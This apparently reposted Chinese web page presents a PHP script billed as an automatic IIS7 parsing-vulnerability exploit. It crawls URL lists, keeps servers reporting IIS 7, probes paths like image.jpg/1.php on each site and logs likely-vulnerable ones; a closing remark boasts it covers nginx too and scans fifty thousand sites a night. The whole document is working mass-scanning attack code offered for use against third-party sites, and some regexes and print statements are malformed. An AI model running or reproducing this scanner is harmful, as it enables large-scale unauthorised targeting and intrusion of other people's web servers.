iiswrite漏洞扫描 自动扫描iis7解析漏洞EXP - IIS - 服务器之家

服务器之家

专注于服务器技术!
当前位置:首页 > Web服务器 > IIS

iiswrite漏洞扫描 自动扫描iis7解析漏洞EXP

发布时间:2017-05-02 来源:服务器之家

Automatic iis7 parsing vulnerability exploit,扫描iis7解析漏洞,自动扫描iis7解析漏洞利用。

exploit.php:

print("

[-] Exploit Title: Automatic iis7.0 exploit [-]

[+] Date: 4/9/2011 [+]

[-] Team: DMTeam [-]

[+] Author: Dark'moon [+]

[-] QQ:40497992 [-]

[-] Email: 40497992@ [-]

[+]Start-----------------------------[+]

[-]Explain:完成后自动关闭 打开ok.txt查看结果[-]\r\n");

error_reporting(E_ERROR);

set_time_limit(0);

f();

//获取url函数

function pregUrl($ip){

$url = @file_get_contents($ip);

//$url_list = file('data.txt');

$preg='/[a-zA-z]+:\/\/www?\.[0-9a-zA-z_]+[\.a-z]+/';

if(preg_match_all($preg,$url,$match_all)){

foreach ($match_all as $value){

$value=array_values(array_unique($value));

foreach ($value as $key=>$ok){

$ok=trim($ok);

print;

write($ok);

}

// pregUrl($ok);

}

}

}

//写入函数

function write($data){

$fileName='t00ls.txt';

$handle = @fopen($fileName,"a");

@fwrite($handle,$data."\r\n");

@fclose($handle);

}

//开始函数

function f(){

$file = file('list_url.txt');

foreach ($file as $value){

$value = trim($value);

pregUrl($value);

}

}

//去掉重复

print;

unique();

function unique(){

$list_url = file('t00ls.txt');

$filename = 'list_url.txt';

$handle = fopen($filename, 'w');

$list_url = array_unique($list_url);

foreach($list_url as $data){

print;

fwrite($handle,$data);

}

}

a();

//获取服务器类型

function Server($url){

$array = get_headers($url,1);

if(array_key_exists('Server',$array)){

if(!is_array($array['Server'])){

$preg = "/7/";

$ma = "网址: ".$url." 服务器类型: ".$array['Server']."\r\n";

echo $ma;

if(preg_match($preg,$ma)){

w($url);//调用写入函数

}

}

}

}

//读入函数

function a(){

$url_list =file('list_url.txt');

//print_r($url_list);

foreach ($url_list as $url){

Server(trim($url));

}

}

//写入函数

function w($url){

$fileName = 'url.txt';

$handle = fopen($fileName,'a');

fwrite($handle,$url."\r\n");

}

urltxt();

//读入url.txt

function urltxt(){

$list_url = file('url.txt');

foreach($list_url as $url){

$url = trim($url);

img($url);

}

}

//获取网页响应码

function curl($url){

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_HEADER, true);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);

curl_setopt($ch, CURLOPT_TIMEOUT, 20);

curl_exec($ch);

$p=curl_getinfo($ch);

curl_close($ch);

if(trim($p['http_code'])=='200'){

print("$url 可能存在漏洞\r\n");

urlwrite($url);

}else{

print("$url 不存在漏洞\r\n");

}

}

//获取网站图片

function img($url){

$htm = file_get_contents($url);

$p='/[0-a-ZA-Z_\/]*\.(gif|jpg|bmp|png|swf|txt)/i';

if(preg_match($p,$htm,$match)){

$url = $url.'/'.$match[0].'/1.php';

curl($url);

}

}

function urlwrite($url){

$ok_filename = 'ok.txt';

$handle = fopen($ok_filename,"a");

fwrite($handle,$url."\r\n");

}

?>

list_url.txt:

把后缀换了,什么最近出的nginx以前的通杀,一晚至少能扫五万个站。